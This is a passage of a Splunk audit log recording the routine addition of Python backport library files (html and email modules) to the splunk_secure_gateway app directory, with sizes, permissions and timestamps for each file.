size=264, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.591, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/html/parser.py", isdir=0, size=19770, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.587, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/html/entities.py", isdir=0, size=75428, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.583, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/html/__init__.py", isdir=0, size=924, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.478, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/mime/text.py", isdir=0, size=1552, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.474, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/mime/nonmultipart.py", isdir=0, size=832, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.469, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/mime/multipart.py", isdir=0, size=1699, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.465, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/mime/message.py", isdir=0, size=1429, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.462, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/mime/image.py", isdir=0, size=1907, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.458, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/mime/base.py", isdir=0, size=875, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.454, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/mime/audio.py", isdir=0, size=2815, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.450, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/mime/application.py", isdir=0, size=1401, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.447, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/mime/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.442, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/utils.py", isdir=0, size=14270, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.439, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/quoprimime.py", isdir=0, size=10923, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.435, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/policy.py", isdir=0, size=8823, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.431, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/parser.py", isdir=0, size=5312, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.427, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/mime", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:27.423, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/message.py", isdir=0, size=35237, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.420, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/iterators.py", isdir=0, size=2348, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.416, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/headerregistry.py", isdir=0, size=20637, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.412, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/header.py", isdir=0, size=24448, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.408, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/generator.py", isdir=0, size=19520, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.404, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/feedparser.py", isdir=0, size=22736, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.4